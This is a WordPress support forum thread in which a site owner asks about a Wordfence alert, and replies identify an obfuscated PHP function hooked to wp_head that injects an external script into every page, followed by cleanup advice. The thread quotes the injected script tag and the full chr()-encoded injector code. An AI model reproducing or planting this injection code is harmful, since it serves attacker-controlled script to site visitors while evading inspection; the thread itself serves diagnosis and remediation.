• Resolved coldxot

    (@coldxot)


    WordPress is detecting a critical issue in my header:

    <script src='https://cdn.scriptsplatform.com/scripts/header.js' type='text/javascript'></script><?php\x0a/*

    But for some reason when I look I do not find this actually in the header when I use the inspect tool on the website. I cannot find any information on this either.

    Is this something to be concerned about?

    Thank you.

Viewing 6 replies - 1 through 6 (of 6 total)
  • I also detected this script in the header. I searched for the string “chr(” in all php files and found a function that uses it.

    function posts_layouts_head(){
    	$sc = "sc"."r"."ipt";
    	echo "<".$sc." ".substr($sc, 0,3)."='htt".chr(112).chr(115).chr(58).chr(47).chr(47).chr(99).chr(100).chr(110).chr(46).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(115).chr(112).chr(108).chr(97).chr(116).chr(102)."orm.com/scripts/stats.js' type='text/java".$sc."'></".$sc.">";
    
    }
    add_action("w"."p_h"."ead",'posts_layouts_head');
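
The "chr(" search described in the reply above can be taken one step further by folding concatenated literals and chr() calls back into plain strings, so the hidden URL and hook name become readable. This is an added example, not part of the original post and not Wordfence code; `fold_chains`, `scan` and the short `INDICATOR` list are assumptions made here, and the sample input is the function quoted in the reply.

```python
import re

# Lex PHP so each quoted literal is consumed whole (no misaligned quotes).
TOKEN = re.compile(r'''
    (?P<str>"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*')  # quoted string literal
  | (?P<chr>\bchr\(\s*\d+\s*\))                    # chr(N) call
  | (?P<dot>\.)                                    # concatenation operator
  | (?P<ws>\s+)
  | (?P<other>.)                                   # anything else ends a chain
''', re.X | re.S | re.I)
INDICATOR = re.compile(r"https?://[\w.-]+|\bwp_(?:head|footer)\b", re.I)  # assumed list

def fold_chains(php):
    """Return (line, value) for each run of 2+ literals/chr() joined by '.'."""
    found, parts, line, after_dot = [], [], 1, False
    def flush():
        if len(parts) > 1:
            found.append((line, "".join(parts)))
        parts.clear()
    for m in TOKEN.finditer(php):
        kind, tok = m.lastgroup, m.group()
        if kind in ("str", "chr"):
            if parts and not after_dot:      # operand with no '.' before it
                flush()
            if not parts:
                line = php.count("\n", 0, m.start()) + 1
            # PHP chr() wraps modulo 256; escapes in literals are kept as written.
            parts.append(tok[1:-1] if kind == "str" else chr(int(tok[4:-1]) % 256))
            after_dot = False
        elif kind == "dot" and parts and not after_dot:
            after_dot = True
        elif kind != "ws":                   # variable, call, ';' ... ends the chain
            flush()
    flush()
    return found

def scan(php):
    """Indicators visible only after folding, i.e. missed by a plain grep."""
    found = ((ln, INDICATOR.search(v)) for ln, v in fold_chains(php))
    return [(ln, m.group()) for ln, m in found if m and m.group() not in php]

# Sample input: the function posted in the reply above (blank line dropped).
SAMPLE = r'''function posts_layouts_head(){
    $sc = "sc"."r"."ipt";
    echo "<".$sc." ".substr($sc, 0,3)."='htt".chr(112).chr(115).chr(58).chr(47).chr(47).chr(99).chr(100).chr(110).chr(46).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(115).chr(112).chr(108).chr(97).chr(116).chr(102)."orm.com/scripts/stats.js' type='text/java".$sc."'></".$sc.">";
}
add_action("w"."p_h"."ead",'posts_layouts_head');'''

if __name__ == "__main__":
    print(scan(SAMPLE))
```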

    Thread Starter coldxot

    (@coldxot)

    Is this a normal function? It’s odd as I have the same setup on other websites and this is not being flagged anywhere else.

    See also in wp-blog-header.php

    Plugin Support wfjanet

    (@wfjanet)

    Hi @coldxot,

    Thank you for reaching out.

    From the issue description you have provided, I suspect this could be a false positive.

    Could you please expand the details button and share a screenshot of the scan result using snipboard so I can take a look and advise?

    Share the link to the screenshot once done.

    I look forward to hearing from you.

    Thanks,

    Janet

    @wfjanet this may not be a false positive but a sign of website exploitation.

    We have responded recently to a cyber incident where this script was found in some of the payloads/changed files.

    @coldxot I recommend investigating your website for signs of compromise, e.g. new changes/files or accounts added, vulnerable plugins, etc.

    Plugin Support wfjanet

    (@wfjanet)

    Thank you @altersec.

    @coldxot
    You can clean the sites by using the following guide: https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/

    Make sure and get all your plugins and themes updated and update WordPress core, too. As a rule, any time I think someone’s site has been compromised, I also tell them to update their passwords for their hosting control panel, FTP, WordPress admin users, and database. Make sure to do this because attack vectors around your hosting or database environments are outside of Wordfence’s influence as an endpoint firewall.

    Additionally, you might find the WordPress Malware Removal section in our Learning Center helpful: https://wordfence.com/learn/ 

    If you’re unable to clean this on your own, there are paid services that will do it for you. Wordfence offers one and there are others. Per the forum rules, we’re not allowed to discuss Premium here, but please reach out to us at presales @ wordfence . com if you have any questions about it.

    Regardless, if you choose to clean it yourself or let someone else do so, we recommend that you make a full backup of the site beforehand.

    Thanks,

    Janet

  • The topic ‘Wordfence detecting critical issue in header’ is closed to new replies.